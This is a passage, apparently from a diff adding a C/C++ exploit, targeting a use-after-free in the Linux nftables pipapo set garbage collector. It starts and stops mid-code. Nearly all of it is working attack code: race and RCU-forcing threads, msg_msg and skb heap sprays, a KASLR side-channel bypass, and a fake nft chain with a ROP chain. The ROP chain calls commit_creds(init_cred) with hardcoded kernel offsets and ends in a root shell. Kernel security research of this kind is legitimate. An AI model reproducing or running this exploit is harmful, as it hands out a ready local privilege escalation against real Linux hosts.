NFTA_SET_ELEM_DATA); + uint64_t dval = 0; nla_put(cbuf, &off, NFTA_DATA_VALUE, &dval, 8); + nest_end(cbuf, &off, dt); + } + nla_put_u64(cbuf, &off, NFTA_SET_ELEM_TIMEOUT, 3600000ULL); + nest_end(cbuf, &off, el); + nest_end(cbuf, &off, els); + msg_end(cbuf, h, &off); + batch_end(cbuf, &off); + + while (!ctx->go) + sched_yield(); /* yield instead of tight spin */ + + ctx->t_start = now_us(); + ctx->result = nl_do(ctx->fd, cbuf, off); + ctx->t_done = now_us(); + ctx->done = 1; + free(cbuf); + return NULL; +} + +/* GP forcer thread — calls MEMBARRIER_CMD_GLOBAL (= synchronize_rcu) on CPU 1 + * to force RCU grace period completion. After synchronize_rcu returns, the GP + * has completed, and kfree callbacks on CPU 0 are eligible to fire (they fire + * at the next softirq/timer tick on CPU 0, within ~1ms with HZ=1000). */ +struct gp_ctx { + volatile int go; + volatile int stop; + volatile int done; + volatile int count; + volatile uint64_t t_start; + volatile uint64_t t_done; +}; + +static void *gp_forcer_fn(void *arg) { + struct gp_ctx *ctx = (struct gp_ctx *)arg; + while (!ctx->go && !ctx->stop) + ; + + ctx->t_start = now_us(); + /* MEMBARRIER_CMD_GLOBAL calls synchronize_rcu() — waits for a full GP. + * This forces the GP started by pipapo_gc's call_rcu to complete. */ + int r = syscall(__NR_membarrier, MEMBARRIER_CMD_GLOBAL, 0, -1); + ctx->t_done = now_us(); + ctx->count = 1; + + /* Keep calling to ensure any late GPs also complete */ + while (!ctx->stop) { + r = syscall(__NR_membarrier, MEMBARRIER_CMD_GLOBAL, 0, -1); + ctx->count++; + if (r < 0) break; + } + ctx->done = 1; + return NULL; +} + +/* Flood thread — sends IPv6 UDP packets to ::1 triggering pipapo lookups */ +struct flood_ctx { + volatile int stop; + volatile long sent; + volatile long recv_ok; + volatile long hit; + volatile long miss; + volatile long changed; + uint64_t changed_vals[256]; + volatile int n_unique_vals; + /* Debug: record raw recv values during commit window, time-gated */ + uint64_t raw_vals[4096]; + uint64_t raw_ts[4096]; /* timestamps relative to commit start */ + volatile int n_raw; + /* Time-bucketed counters (each 2ms bucket from 0-20ms) */ + volatile long bucket_miss[10]; + volatile long bucket_changed[10]; + volatile long bucket_hit[10]; + volatile int recording; + volatile uint64_t t_base; /* commit start time for relative timestamps */ + volatile uint64_t record_after_us; /* only record after this many us from t_base */ +}; + +static void *flood_fn(void *arg) { + struct flood_ctx *ctx = (struct flood_ctx *)arg; + + int sfd = socket(AF_INET6, SOCK_DGRAM, 0); + int rfd = socket(AF_INET6, SOCK_DGRAM, 0); + if (sfd < 0 || rfd < 0) { perror("flood socket"); return NULL; } + + /* Bind receiver to port 9999 on ::1 */ + struct sockaddr_in6 raddr = { + .sin6_family = AF_INET6, + .sin6_port = htons(9999), + .sin6_addr = IN6ADDR_LOOPBACK_INIT, + }; + if (bind(rfd, (struct sockaddr *)&raddr, sizeof(raddr)) < 0) { + perror("flood bind"); + close(sfd); close(rfd); return NULL; + } + struct timeval tv = { .tv_sec = 0, .tv_usec = 1000 }; + setsockopt(rfd, SOL_SOCKET, SO_RCVTIMEO, &tv, sizeof(tv)); + + /* Bind sender to ::1 explicitly */ + struct sockaddr_in6 saddr = { + .sin6_family = AF_INET6, + .sin6_addr = IN6ADDR_LOOPBACK_INIT, + }; + bind(sfd, (struct sockaddr *)&saddr, sizeof(saddr)); + + struct sockaddr_in6 dst = { + .sin6_family = AF_INET6, + .sin6_port = htons(9999), + .sin6_addr = IN6ADDR_LOOPBACK_INIT, + }; + + char pkt[32], rbuf[64]; + memset(pkt, 0xBB, sizeof(pkt)); + + while (!ctx->stop) { + int sr = sendto(sfd, pkt, sizeof(pkt), MSG_DONTWAIT, (struct sockaddr *)&dst, sizeof(dst)); + if (sr > 0) ctx->sent++; + /* Yield every 8 sends to report RCU quiescent state on CPU 1 */ + if ((ctx->sent & 7) == 0) + sched_yield(); + + for (int drain = 0; drain < 8; drain++) { + int n = recv(rfd, rbuf, sizeof(rbuf), MSG_DONTWAIT); + if (n < 0) break; + ctx->recv_ok++; + if (n >= 8) { + uint64_t val; + memcpy(&val, rbuf, 8); + /* Record raw values during commit window (time-gated) */ + if (ctx->recording) { + uint64_t elapsed = now_us() - ctx->t_base; + if (elapsed >= ctx->record_after_us && ctx->n_raw < 4096) { + int idx = ctx->n_raw; + ctx->raw_vals[idx] = val; + ctx->raw_ts[idx] = elapsed; + ctx->n_raw++; + } + /* Update time-bucketed counters (2ms buckets, 0-20ms) */ + int bucket = (int)(elapsed / 2000); + if (bucket >= 0 && bucket < 10) { + if (val == 0xBBBBBBBBBBBBBBBBULL) + ctx->bucket_miss[bucket]++; + else if (val == 0xAAAAAAAAAAAAAAAAULL) + ctx->bucket_hit[bucket]++; + else + ctx->bucket_changed[bucket]++; + } + } + if (val == 0xBBBBBBBBBBBBBBBBULL) + ctx->miss++; + else if (val == 0xAAAAAAAAAAAAAAAAULL) + ctx->hit++; + else if (val == 0) + ctx->changed++; /* zero = our fill, count but don't record */ + else { + ctx->changed++; + if (ctx->n_unique_vals < 256) { + int dup = 0; + for (int j = 0; j < ctx->n_unique_vals; j++) + if (ctx->changed_vals[j] == val) { dup = 1; break; } + if (!dup) + ctx->changed_vals[ctx->n_unique_vals++] = val; + } + } + } + } + } + close(sfd); close(rfd); + return NULL; +} + + +/* CPU 1 spray thread — catches kfree from GC workqueue running on CPU 1. + * Without this, only kfree on CPU 0 is reclaimable (spray on CPU 0). + * GC workqueue runs on random CPU, so ~50% of kfrees go to CPU 1. */ +struct spray1_ctx { + volatile int go; + volatile int stop; + volatile int go_phase2; /* Set when commit starts — gates phase 2 */ + volatile long count; + volatile int phase; /* 1 = filling main, 2 = waiting, 3 = filling reclaim */ + int *qids; + int n_queues; + int *reclaim_qids; /* Extra queues for pure allocation (no drain) */ + int n_reclaim; +}; + +static void *spray1_fn(void *arg) { + struct spray1_ctx *ctx = (struct spray1_ctx *)arg; + struct { long mtype; char mtext[SPRAY_MSG_DSIZE]; } spray_msg; + spray_msg.mtype = 0x42; + for (int i = 0; i < SPRAY_MSG_DSIZE; i++) + spray_msg.mtext[i] = 0x41 + i; + + while (!ctx->go && !ctx->stop) + ; + + /* Phase 1: Fast fill — exhaust existing slab pages. + * This puts ~200 msgs per queue × 1024 queues = ~204K allocations. + * After this, per-cpu freelist is empty. */ + ctx->phase = 1; + int qi = 0; + int phase1_sent = 0; + while (!ctx->stop) { + if (msgsnd(ctx->qids[qi], &spray_msg, SPRAY_MSG_DSIZE, IPC_NOWAIT) == 0) { + ctx->count++; + phase1_sent++; + } + qi = (qi + 1) % ctx->n_queues; + if (qi == 0) { + if (phase1_sent == 0) + break; /* All queues full */ + phase1_sent = 0; + sched_yield(); + } + } + + ctx->phase = 2; + /* Phase 2: Wait for commit to start. Phase 1 saturated SLUB cache. + * We must NOT allocate yet — if we fill reclaim queues now, there's + * no allocation capacity during the vmalloc window. */ + while (!ctx->go_phase2 && !ctx->stop) + ; + + ctx->phase = 3; + /* Phase 3: Pure allocation into reclaim queues (NO drain/free). + * Commit is running pipapo_gc → call_rcu(kfree) → vmalloc. + * When kfree fires, target page becomes ONLY partial on CPU 0. + * These allocs exhaust c->slab leftovers then pick the freed page. + * CRITICAL: no drain/free here = no SLUB freelist pollution. */ + qi = 0; + while (!ctx->stop && ctx->reclaim_qids) { + if (msgsnd(ctx->reclaim_qids[qi], &spray_msg, SPRAY_MSG_DSIZE, IPC_NOWAIT) == 0) + ctx->count++; + qi = (qi + 1) % ctx->n_reclaim; + } + return NULL; +} + +/* ====== Phase 3: Code execution via nft_immediate OOB dreg ====== */ + +/* Kernel symbol offsets: resolved at runtime via kernelXDK target DB. + * Fallback hardcoded values for cos-121-18867.381.30 used when DB unavailable. */ +#define OFF_NFT_IMMEDIATE_EVAL 0x12323d0ULL +#define OFF_COMMIT_CREDS 0x1ffbe0ULL +#define OFF_INIT_CRED 0x2e72f20ULL +#define OFF_POP_RDI_RET 0x160db4ULL +#define OFF_SWAPGS_IRETQ 0x1601949ULL +#define OFF_NFT_IMM_OPS 0x1d8d500ULL /* nft_imm_ops in .data, for kernelXDK symbol table */ + +/* Global target reference for kernelXDK, set in main() */ +static Target *g_target = nullptr; + +static uint64_t user_cs, user_ss, user_rflags, user_rsp; +static void save_state(void) { + asm volatile( + "mov %%cs, %0\n" + "mov %%ss, %1\n" + "pushfq\n" + "pop %2\n" + "mov %%rsp, %3\n" + : "=r"(user_cs), "=r"(user_ss), "=r"(user_rflags), "=r"(user_rsp) + ); +} + +static void shell(void) { + if (getuid() == 0) { + printf("[!!!] GOT ROOT!\n"); + execl("/bin/sh", "sh", NULL); + } + printf("[-] Not root (uid=%d)\n", getuid()); + exit(1); +} + +/* + * Build the fake chain mtext buffer for a msg_msg at address `base`. + * The mtext starts at base+48 (after msg_msg header). + * + * Layout within mtext (464 bytes): + * [0-7]: fake chain: blob_gen_0 = base+48+16 (→ blob) + * [8-15]: fake chain: blob_gen_1 = base+48+16 (→ blob) + * [16-23]: blob header: size = 256 + * [24-31]: rule_dp: is_last=0, dlen=64 (2 exprs × 32B) → u64 = 0x80 + * [32-63]: expr1 (verdict reset): ops→fake_ops, dreg=0, dlen=4, data=NFT_CONTINUE + * [64-95]: expr2 (OOB ROP write): ops→fake_ops, dreg=54, dlen=136, data=ROP start + * [96-103]: sentinel rule_dp: is_last=1 → u64 = 1 + * [104+]: ROP chain continuation (read as part of expr2's memcpy source) + * [300-319]: fake nft_expr_ops: eval=nft_immediate_eval, select_ops=0, size=32 + */ +static void build_fake_chain_mtext(uint8_t *mtext, uint64_t base, uint64_t kbase) { + memset(mtext, 0, SPRAY_MSG_DSIZE); + + uint64_t mtext_base = base + 48; /* msg_msg header = 48 bytes */ + uint64_t blob_addr = mtext_base + 16; + /* Self-referencing fake ops within the msg_msg mtext. + * Cannot use kernel's nft_imm_ops because .rodata function pointers + * are NOT runtime-relocated on COS kernels (KASLR only shifts the + * virtual address of the section, not the pointer values within). */ + uint64_t ops_addr = mtext_base + 300; + uint64_t nft_immediate_eval_addr = kbase + OFF_NFT_IMMEDIATE_EVAL; + + /* [0-15]: fake nft_chain (first two fields) */ + *(uint64_t *)&mtext[0] = blob_addr; /* blob_gen_0 */ + *(uint64_t *)&mtext[8] = blob_addr; /* blob_gen_1 */ + + /* [16-23]: fake nft_rule_blob header */ + *(uint64_t *)&mtext[16] = 256; /* size (arbitrary, just needs to be >= rule data) */ + + /* [24-31]: rule_dp header: is_last=0, dlen=64 (two 32-byte expressions) + * Bitfield: bit0=is_last, bits1-12=dlen. u64 = (dlen << 1) | is_last = (64<<1)|0 = 128 */ + *(uint64_t *)&mtext[24] = 128; + + /* [32-63]: expr1 — verdict reset to NFT_CONTINUE + * Layout: [ops(8)] [priv.data(16)] [priv.dreg(1)] [priv.dlen(1)] [pad(6)] */ + *(uint64_t *)&mtext[32] = ops_addr; /* expr1.ops */ + *(uint32_t *)&mtext[40] = 0xFFFFFFFF; /* priv.data[0] = NFT_CONTINUE = -1 */ + /* priv.data[1..3] = 0 (already zeroed) */ + mtext[56] = 0; /* dreg = 0 (verdict register) */ + mtext[57] = 4; /* dlen = 4 (just the verdict code) */ + + /* [64-95]: expr2 — OOB dreg write (ROP chain to stack) + * Source for memcpy: starts at expr2+0x08 = mtext[72] + * Writes 136 bytes to rsp+0xf8 (saved rbx through iretq SS) */ + *(uint64_t *)&mtext[64] = ops_addr; /* expr2.ops */ + /* expr2 priv.data starts at mtext[72] — this IS the ROP source. + * The first 16 bytes of source = priv.data[0-15] = mtext[72-87] + * = saved rbx (8B) + saved rbp (8B) */ + *(uint64_t *)&mtext[72] = 0; /* saved rbx (don't care) */ + *(uint64_t *)&mtext[80] = 0; /* saved rbp (don't care) */ + /* priv.dreg and priv.dlen at mtext[88-89] — part of saved r12 */ + mtext[88] = 54; /* dreg = 54 → writes to rsp+0xf8 */ + mtext[89] = 136; /* dlen = 136 bytes */ + /* mtext[90-95] = padding, becomes upper bytes of saved r12 */ + /* These 6 bytes are part of saved r12 — don't care about the value */ + + /* [96-103]: sentinel rule_dp (is_last=1) — also saved r13 in ROP chain */ + *(uint64_t *)&mtext[96] = 1; /* is_last=1 */ + + /* ROP chain continuation: source bytes 32+ (mtext[104+]) */ + /* Source byte mapping: + * 0-7: mtext[72-79] = saved rbx (0) + * 8-15: mtext[80-87] = saved rbp (0) + * 16-17: mtext[88-89] = dreg/dlen (part of saved r12, low bytes) + * 18-23: mtext[90-95] = pad (rest of saved r12) + * 24-31: mtext[96-103] = sentinel (saved r13 = 1) + * 32-39: mtext[104-111] = saved r14 + * 40-47: mtext[112-119] = saved r15 + * 48-55: mtext[120-127] = return addr (pop_rdi; ret) + * 56-63: mtext[128-135] = init_cred + * 64-71: mtext[136-143] = commit_creds + * 72-79: mtext[144-151] = swapgs_iretq entry + * 80-87: mtext[152-159] = 0 (pop rax) + * 88-95: mtext[160-167] = 0 (pop rdi) + * 96-103: mtext[168-175] = user_rip (shell) + * 104-111: mtext[176-183] = user_cs + * 112-119: mtext[184-191] = user_rflags + * 120-127: mtext[192-199] = user_rsp + * 128-135: mtext[200-207] = user_ss + */ + *(uint64_t *)&mtext[104] = 0; /* saved r14 */ + *(uint64_t *)&mtext[112] = 0; /* saved r15 */ + + /* @step(name="rop_chain") Build ROP chain using kernelXDK if available */ + bool use_manual = true; + if (g_target) { + try { + RopChain rop(*g_target, kbase); + rop.AddRopAction(RopActionId::COMMIT_INIT_TASK_CREDS); + rop.AddRopAction(RopActionId::SWITCH_TASK_NAMESPACES, {1}); + rop.AddRopAction(RopActionId::KPTI_TRAMPOLINE, {(uint64_t)shell}); + auto rop_data = rop.GetData(); + memcpy(&mtext[120], rop_data.data(), + rop_data.size() < 344 ? rop_data.size() : 344); + use_manual = false; + } catch (...) { + printf("[*] kernelXDK RopChain failed, using manual chain\n"); + } + } + if (use_manual) { + /* Fallback: manual ROP chain with hardcoded offsets */ + *(uint64_t *)&mtext[120] = kbase + OFF_POP_RDI_RET; + *(uint64_t *)&mtext[128] = kbase + OFF_INIT_CRED; + *(uint64_t *)&mtext[136] = kbase + OFF_COMMIT_CREDS; + *(uint64_t *)&mtext[144] = kbase + OFF_SWAPGS_IRETQ; + *(uint64_t *)&mtext[152] = 0; + *(uint64_t *)&mtext[160] = 0; + *(uint64_t *)&mtext[168] = (uint64_t)shell; + *(uint64_t *)&mtext[176] = user_cs; + *(uint64_t *)&mtext[184] = user_rflags; + *(uint64_t *)&mtext[192] = user_rsp; + *(uint64_t *)&mtext[200] = user_ss; + } + + /* [300-319]: fake nft_expr_ops (self-referencing within msg_msg mtext) */ + *(uint64_t *)&mtext[300] = nft_immediate_eval_addr; /* ops->eval */ + *(uint64_t *)&mtext[308] = 0; /* ops->select_ops = NULL */ + *(uint32_t *)&mtext[316] = 32; /* ops->size = 0x20 */ +} + +/* + * Build skb payload for Phase 3 reclaim of verdict map element. + * Controls ext header offsets so pipapo_lookup returns our fake verdict. + * The verdict points to the fake chain in a msg_msg at chain_addr. + */ +static void build_skb_payload(uint8_t *payload, int payload_len, uint64_t chain_addr) { + memset(payload, 0, payload_len); + + payload[0] = 0; /* genmask = 0 → active */ + payload[3] = 16; /* offset[DATA] = 16 → verdict at byte 16 */ + payload[6] = 160; /* offset[EXPIRATION] = 160 */ + payload[8] = 0; /* offset[EXPRESSIONS] = 0 */ + + /* Verdict at offset 16: NFT_GOTO to fake chain */ + *(uint32_t *)&payload[16] = 0xFFFFFFFC; /* NFT_GOTO = -4 */ + *(uint32_t *)&payload[20] = 0; + *(uint64_t *)&payload[24] = chain_addr; + + /* Expiration at offset 160: far future */ + *(uint64_t *)&payload[160] = 0x7FFFFFFFFFFFFFFFULL; +} + +/* SKB spray via AF_UNIX SOCK_DGRAM socketpairs. + * The skb data area (kmalloc-cg-512) contains our controlled payload at byte 0. + * Max payload for kmalloc-cg-512: 192 bytes (512 - 320 skb_shared_info). */ +/* SKB payload for kmalloc-cg-512: max 192 bytes (512 - 320 skb_shared_info). + * The skb holds the controlled ext header + verdict. The fake chain + ROP data + * lives in a separate msg_msg at the heap_leak address. */ +#define SKB_SPRAY_PAYLOAD 192 +#define SKB_SPRAY_COUNT 128 + +static int skb_spray_fds[SKB_SPRAY_COUNT][2]; /* socketpairs */ + +static int skb_spray_init(void) { + for (int i = 0; i < SKB_SPRAY_COUNT; i++) { + if (socketpair(AF_UNIX, SOCK_DGRAM, 0, skb_spray_fds[i]) < 0) { + perror("skb socketpair"); + return -1; + } + /* Set receive buffer small to prevent kernel from dropping */ + int rcvbuf = 512; + setsockopt(skb_spray_fds[i][1], SOL_SOCKET, SO_RCVBUF, &rcvbuf, sizeof(rcvbuf)); + } + return 0; +} + +static int skb_spray_send(uint8_t *payload, int payload_len) { + int sent = 0; + for (int i = 0; i < SKB_SPRAY_COUNT; i++) { + if (write(skb_spray_fds[i][0], payload, payload_len) == payload_len) + sent++; + } + return sent; +} + +static void skb_spray_free(void) { + for (int i = 0; i < SKB_SPRAY_COUNT; i++) { + close(skb_spray_fds[i][0]); + close(skb_spray_fds[i][1]); + } +} + +int main(int argc, char **argv) { + setvbuf(stdout, NULL, _IOLBF, 0); + printf("=== pipapo GC UAF exploit (vmalloc approach) ===\n"); + + /* @step(name="vuln_trigger") --vuln-trigger: trigger vuln on KASAN build and exit */ + int vuln_trigger_only = 0; + uint64_t external_kaslr = 0; + for (int i = 1; i < argc; i++) { + if (strcmp(argv[i], "--vuln-trigger") == 0) + vuln_trigger_only = 1; + else { + char *endp; + uint64_t v = strtoull(argv[i], &endp, 16); + if (*endp == '\0') { + if (v > 0xffffffff80000000ULL) + external_kaslr = v; + else if (v == 0) + external_kaslr = 0xffffffff81000000ULL; + } + } + } + + /* Raise fd limit for spray queues + socketpairs */ + { + struct rlimit rl = { .rlim_cur = 65536, .rlim_max = 65536 }; + setrlimit(RLIMIT_NOFILE, &rl); + } + + /* @step(name="xdk_init") Initialize kernelXDK target database */ + static TargetDb kxdb("target_db.kxdb", target_db); + + try { + static auto target = kxdb.AutoDetectTarget(); + g_target = ⌖ + printf("[+] kernelXDK target: %s %s\n", + target.GetDistro().c_str(), target.GetReleaseName().c_str()); + } catch (...) { + printf("[*] kernelXDK auto-detect failed, using hardcoded offsets\n"); + g_target = nullptr; + } + + /* Save userspace state for iretq return */ + save_state(); + printf("[+] Saved userspace state: cs=0x%lx ss=0x%lx rsp=0x%lx\n", + (unsigned long)user_cs, (unsigned long)user_ss, (unsigned long)user_rsp); + + /* @step(name="kaslr") KASLR text base via prefetch side-channel. + * Skip in --vuln-trigger mode (KASAN build, no KASLR needed). */ + uint64_t text_base = 0; + if (vuln_trigger_only) { + printf("[*] --vuln-trigger mode: skipping KASLR bypass\n"); + text_base = 0xffffffff81000000ULL; + } else if (external_kaslr) { + text_base = external_kaslr; + printf("[+] Using KASLR base from argv: 0x%016lx\n", (unsigned long)text_base); + } else { + printf("[*] Bypassing KASLR via prefetch side-channel...\n"); + text_base = bypass_kaslr(); + if (!text_base) { + printf("[-] KASLR bypass failed. Exiting (code 2).\n"); + return 2; + } + } + printf("[+] text_base = 0x%016lx\n", (unsigned long)text_base); + printf("[+] commit_creds = 0x%016lx\n", (unsigned long)(text_base + OFF_COMMIT_CREDS)); + + printf("\nFillers: %d (1hr timeout)\n", NUM_FILLERS); + printf("Target: 1 element at (::1,::1) with 2s timeout\n"); + printf("Key: 32 bytes (concat [16,16] IPv6 src+dst)\n"); + printf("Padding: %d elements (in kmalloc-cg-96, inflates vmalloc)\n", NUM_PADDING); + long total_elems = (long)NUM_FILLERS + NUM_TARGETS + NUM_PADDING; + printf("At bb=4: lt_size = 4096 * ceil(%ld/64) = %lu bytes per field\n", + total_elems, + 4096UL * ((total_elems + 63) / 64)); + printf("KMALLOC_MAX_SIZE = 4MB (MAX_ORDER=10) → vmalloc forced\n\n"); + + setup_ns(); + setup_lo(); + printf("[+] Namespace ready (IPv6 loopback)\n"); + + /* Pin to CPU 0 early — ensures all SLUB allocations (fillers, target) + * happen on CPU 0's freelist. Critical for spray reclaim: kfree in RCU + * callback on CPU 0 puts target on CPU 0's per-cpu freelist, and spray + * thread on CPU 0 can reclaim it immediately. */ + { + cpu_set_t cpuset; + CPU_ZERO(&cpuset); + CPU_SET(0, &cpuset); + sched_setaffinity(0, sizeof(cpuset), &cpuset); + } + printf("[+] Main thread pinned to CPU 0\n"); + + int fd = nl_open(); + char *buf = (char *)malloc(BUF_SIZE); + if (!buf) die("malloc"); + + int rc; + int num_commits = 0; + rc = nft_table(fd, buf); if (rc) die("table: %d", rc); num_commits++; + rc = nft_chain(fd, buf); if (rc) die("chain: %d", rc); num_commits++; + rc = nft_set(fd, buf); if (rc) die("set s: %d", rc); num_commits++; + rc = nft_set_v(fd, buf); if (rc) die("set v: %d", rc); num_commits++; + rc = nft_rule(fd, buf); if (rc) die("rule s: %d", rc); num_commits++; + rc = nft_rule_v(fd, buf); if (rc) die("rule v: %d", rc); num_commits++; + printf("[+] Table/chain/sets/rules created (%d commits)\n", num_commits); + + printf("[*] Adding %d fillers to set 's' (this takes ~30s)...\n", NUM_FILLERS); + uint64_t t0 = now_us(); + if (add_fillers(fd, buf, NUM_FILLERS)) die("fillers(s) failed"); + { + int batches = (NUM_FILLERS + BATCH_CHUNK - 1) / BATCH_CHUNK; + num_commits += batches; + } + printf("[+] Fillers(s) added in %.1fs (%d commits total)\n", (now_us() - t0) / 1e6, num_commits); + + printf("[*] Adding %d fillers to set 'v' (this takes ~30s)...\n", NUM_FILLERS); + t0 = now_us(); + if (add_fillers_to(fd, buf, NUM_FILLERS, "v")) die("fillers(v) failed"); + { + int batches = (NUM_FILLERS + BATCH_CHUNK - 1) / BATCH_CHUNK; + num_commits += batches; + } + printf("[+] Fillers(v) added in %.1fs (%d commits total)\n", (now_us() - t0) / 1e6, num_commits); + + if (NUM_PADDING > 0) { + printf("[*] Adding %d padding elements (inflates vmalloc, goes to kmalloc-cg-96)...\n", NUM_PADDING); + t0 = now_us(); + if (add_padding(fd, buf, NUM_PADDING)) die("padding failed"); + { int batches = (NUM_PADDING + BATCH_CHUNK - 1) / BATCH_CHUNK; + num_commits += batches; } + printf("[+] Padding added in %.1fs (%d commits total)\n", (now_us() - t0) / 1e6, num_commits); + } + + /* Fillers (kmalloc-cg-128) and target (kmalloc-cg-512) are in DIFFERENT caches. + * After kfree(target) by pipapo_gc, spray msg_msgs (512B) reclaim the slot. + * msg_msg m_list.next/prev = kernel heap pointers → corrupt ext->offset[]. + * 512-byte alignment guarantees byte 0=0 (active), byte 8=0 (no expr crash). + * offset[EXPIRATION]=0xFF → ext+255 reads WITHIN same 512B msg_msg → mtext + * data → positive signed value → NOT expired → lookup proceeds! + * + * After reclaim, ext->offset[DATA] = byte 3 of m_list.next pointer. + * When byte 3 ∈ [0x00-0x0F], lookup reads from m_list.next/prev → heap leak. + * Probability ~6% per trial. We loop until we get it. + */ + + /* Flood thread on CPU 1 — has the entire CPU for fast lookups. + * Lookups dereference the shared priv->match pointer under RCU. + * CPU 0 is reserved for commit + spray (SLUB reclaim requires same CPU). + * CPU 1 has flood + GP forcer. GP forcer blocks in synchronize_rcu, + * giving flood most of CPU 1 time between GP completions. */ + struct flood_ctx fctx = {}; + pthread_t ftid; + { + pthread_attr_t attr; + pthread_attr_init(&attr); + cpu_set_t cpuset; + CPU_ZERO(&cpuset); + CPU_SET(1, &cpuset); + pthread_attr_setaffinity_np(&attr, sizeof(cpuset), &cpuset); + pthread_create(&ftid, &attr, flood_fn, &fctx); + pthread_attr_destroy(&attr); + } + usleep(200000); /* 200ms warmup */ + printf("[+] Flood running: sent=%ld recv=%ld\n", fctx.sent, fctx.recv_ok); + + /* Verify lookup works: add target, send packets, check for hits */ + { + printf("[*] Verifying lookup works...\n"); + if (add_target(fd, buf)) die("verify target failed"); + num_commits++; + usleep(100000); /* 100ms for match table update */ + long prev_hit = fctx.hit; + usleep(200000); /* 200ms to collect hits */ + long verify_hits = fctx.hit - prev_hit; + printf("[+] Verification: %ld hits in 200ms (expect >0)\n", verify_hits); + if (verify_hits == 0) { + printf("[!] WARNING: Lookup not working! Check rule/set/key.\n"); + printf("[!] sent=%ld recv=%ld miss=%ld hit=%ld\n", + fctx.sent, fctx.recv_ok, fctx.miss, fctx.hit); + } + /* Delete the verification target — it will expire on its own (2s timeout). + * We add a fresh one per cycle. Just wait for it to expire. */ + sleep(3); + printf("[+] Verification target expired\n"); + } + + /* Per-cycle queues: created fresh, cleaned up on failure. + * Declared outside loop so Phase 3 can drain them after break. */ + int spray_qids[NUM_SPRAY_QUEUES]; + int reclaim_qids[NUM_RECLAIM_QUEUES]; + + uint64_t heap_leak = 0; + uint64_t text_leak = 0; + int dummy_idx = 1; + + for (int cycle = 0; cycle < MAX_CYCLES; cycle++) { + printf("\n=== CYCLE %d/%d ===\n", cycle, MAX_CYCLES); + for (int i = 0; i < NUM_SPRAY_QUEUES; i++) { + spray_qids[i] = msgget(IPC_PRIVATE, 0666); + if (spray_qids[i] < 0) + die("msgget[cycle=%d,q=%d]: %s", cycle, i, strerror(errno)); + } + for (int i = 0; i < NUM_RECLAIM_QUEUES; i++) { + reclaim_qids[i] = msgget(IPC_PRIVATE, 0666); + if (reclaim_qids[i] < 0) + die("msgget reclaim[cycle=%d,q=%d]: %s", cycle, i, strerror(errno)); + } + printf("[*] Created %d+%d queues (main+reclaim)\n", + NUM_SPRAY_QUEUES, NUM_RECLAIM_QUEUES); + + /* Add target element (::1,::1) with 2s timeout */ + if (add_target(fd, buf)) die("target failed (cycle %d)", cycle); + num_commits++; + + /* CPU layout: commit + spray1 on CPU 0, flood + GP forcer on CPU 1. + * Phase 1 fills main queues (saturates SLUB cache, all pages FULL). + * Phase 2 fills reclaim queues (pure alloc, no drain/free). + * When kfree fires, target page is ONLY partial on CPU 0. + * Phase 2 allocs exhaust c->slab leftovers, then pick freed page. */ + struct spray1_ctx sctx1 = { + .qids = spray_qids, + .n_queues = NUM_SPRAY_QUEUES, + .reclaim_qids = reclaim_qids, + .n_reclaim = NUM_RECLAIM_QUEUES + }; + pthread_t spray1_tid; + { + pthread_attr_t attr; + pthread_attr_init(&attr); + cpu_set_t cpuset; + CPU_ZERO(&cpuset); + CPU_SET(0, &cpuset); /* Must be CPU 0: target page frozen on CPU 0's partial list */ + pthread_attr_setaffinity_np(&attr, sizeof(cpuset), &cpuset); + pthread_create(&spray1_tid, &attr, spray1_fn, &sctx1); + pthread_attr_destroy(&attr); + } + + struct gp_ctx gpctx = {}; + pthread_t gp_tid; + { + pthread_attr_t attr; + pthread_attr_init(&attr); + cpu_set_t cpuset; + CPU_ZERO(&cpuset); + CPU_SET(1, &cpuset); /* GP forcer on CPU 1 — separate from commit (CPU 0) */ + pthread_attr_setaffinity_np(&attr, sizeof(cpuset), &cpuset); + pthread_create(&gp_tid, &attr, gp_forcer_fn, &gpctx); + pthread_attr_destroy(&attr); + } + + /* Start GP forcer and spray EARLY. Spray fills during the 3s wait, + * saturating CPU 0's SLUB cache. When commit's kfree fires, the + * freed page is the ONLY partial → next allocation reclaims it. + * Spray phase 2 (drain-refill) keeps allocating during vmalloc. */ + gpctx.go = 1; + sctx1.go = 1; /* Start spray NOW — fills during sleep */ + + /* Passive wait for target to expire (2s timeout + 1s margin). + * During this time, spray1 fills all queues (phase 1 → phase 2). */ + sleep(3); + + /* Print flood stats from the wait phase (before reset) */ + printf("[*] Wait-phase flood: sent=%ld recv=%ld miss=%ld hit=%ld changed=%ld\n", + fctx.sent, fctx.recv_ok, fctx.miss, fctx.hit, fctx.changed); + if (fctx.changed > 0) { + printf("[!!!] UAF data seen during wait phase!\n"); + for (int i = 0; i < fctx.n_unique_vals; i++) { + uint64_t v = fctx.changed_vals[i]; + uint8_t *vb = (uint8_t *)&v; + printf(" wait_val[%d] = 0x%016lx [%02x %02x %02x %02x %02x %02x %02x %02x]\n", + i, (unsigned long)v, + vb[0], vb[1], vb[2], vb[3], vb[4], vb[5], vb[6], vb[7]); + } + } + + /* Reset flood counters */ + fctx.sent = fctx.recv_ok = fctx.miss = fctx.hit = fctx.changed = 0; + fctx.n_unique_vals = 0; + fctx.n_raw = 0; + memset((void *)fctx.bucket_miss, 0, sizeof(fctx.bucket_miss)); + memset((void *)fctx.bucket_hit, 0, sizeof(fctx.bucket_hit)); + memset((void *)fctx.bucket_changed, 0, sizeof(fctx.bucket_changed)); + + /* Commit thread on CPU 0 — runs nft_commit (pipapo_gc + pipapo_clone). + * pipapo_gc calls call_rcu(kfree) on CPU 0. + * kfree fires on CPU 0 (softirq) → full page becomes partial → + * put_cpu_partial adds to CPU 0's partial list. + * spray1 also on CPU 0 → allocates from CPU 0's partial → reclaims. + * During vmalloc (~10ms), cond_resched switches between commit and spray1. + * GP forcer on CPU 1 forces GP completion via membarrier. */ + struct commit_ctx cctx = {}; + cctx.fd = fd; + cctx.idx = dummy_idx++; + pthread_t commit_tid; + { + pthread_attr_t attr; + pthread_attr_init(&attr); + cpu_set_t cpuset; + CPU_ZERO(&cpuset); + CPU_SET(0, &cpuset); /* Same CPU as spray1 — SLUB reclaim requires same CPU */ + pthread_attr_setaffinity_np(&attr, sizeof(cpuset), &cpuset); + pthread_create(&commit_tid, &attr, commit_fn, &cctx); + pthread_attr_destroy(&attr); + } + + uint64_t t0 = now_us(); + fctx.t_base = t0; + fctx.record_after_us = 0; + fctx.recording = 1; + /* spray1 finished phase 1 (SLUB saturated), waiting in phase 2. + * Start both commit and spray phase 3 simultaneously. */ + long spray_pre = sctx1.count; /* Phase 1 total */ + sctx1.go_phase2 = 1; + cctx.go = 1; + + /* Main thread on CPU 0: yield to commit+spray threads. + * GP forcer on CPU 1 